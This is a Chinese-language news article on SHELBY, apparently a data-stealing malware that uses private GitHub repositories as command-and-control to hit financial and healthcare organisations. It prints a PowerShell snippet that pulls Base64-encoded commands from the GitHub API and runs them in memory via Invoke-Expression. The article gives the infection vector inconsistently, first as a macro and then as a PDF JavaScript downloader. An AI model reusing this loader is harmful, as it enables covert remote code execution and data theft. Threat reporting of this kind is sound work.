在网络安全领域,一种被称为 SHELBY 的复杂新型数据窃取恶意软件变种已经出现,其主要目标是北美和欧洲的金融机构及医疗保健组织。
这种恶意软件采用多阶段感染过程。一切始于包含看似合法发票附件的网络钓鱼电子邮件,当这些附件被打开时,会触发一个恶意宏,从而启动感染链。
一旦安装成功,SHELBY 会在后台悄悄运行,收集包括登录凭据、财务数据和患者记录等敏感信息,然后将这些信息泄露给其操控者。
SHELBY 特别值得注意的地方在于,它滥用了 GitHub 的基础设施来进行命令与控制(C2)操作。该恶意软件会在 GitHub 上创建并访问私有存储库,其操控者将命令以 Base64 编码字符串的形式存储在看似无害的文本文件中。
这种方式使得恶意软件能够将其通信混入发往 GitHub 域名的合法 HTTPS 流量中,这让传统的安全工具更难检测到它,因为传统安全工具通常不会阻止对广泛使用的开发平台的访问。
Elastic 的分析师在 2025 年 3 月初调查多家医疗保健提供商发生的一系列数据泄露事件时发现了 SHELBY 。他们的分析显示,在被发现之前,该恶意软件已在大约三个月的时间里未被察觉,这凸显了它复杂的逃避检测能力。
研究人员指出,这代表了一种日益增长的趋势,即威胁行为者利用受信任的平台和服务来托管恶意基础设施。
SHELBY 造成的影响巨大,至少有 17 个组织证实发生了与该恶意软件相关的数据泄露事件。被泄露的数据包括个人身份识别信息、医疗记录以及金融账户详细信息。
几家受影响的组织已根据监管要求,开始通知客户可能存在的数据泄露情况。
感染机制
SHELBY 的感染过程始于嵌入 PDF 附件中的一个 JavaScript 下载器,当该下载器被执行时,会从一个已被攻陷的网站下载一个 PowerShell 脚本。
该脚本包含以下代码片段,用于与基于 GitHub 的命令与控制(C2)服务器建立通信:
$repo = “https://api.github.com/repos/legitimate-looking-name/resources/contents”
$token = “ghp_1a2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s0”
$encodedAuth = [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes(“$token”))
$headers = @{“Authorization” = “Basic $encodedAuth”}
$response = Invoke-WebRequest -Uri $repo -Headers $headers | ConvertFrom-Json
$commands = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($response. Content))
Invoke-Expression $commands
这段代码从 GitHub 存储库中检索 Base64 编码的指令,对其进行解码,然后直接在内存中执行,在磁盘上留下的痕迹极少。
该恶意软件通过一个计划任务来保持持久性,这个计划任务看似是一个合法的系统维护进程,有助于它逃避安全解决方案的检测。
发表评论
您还未登录,请先登录。
登录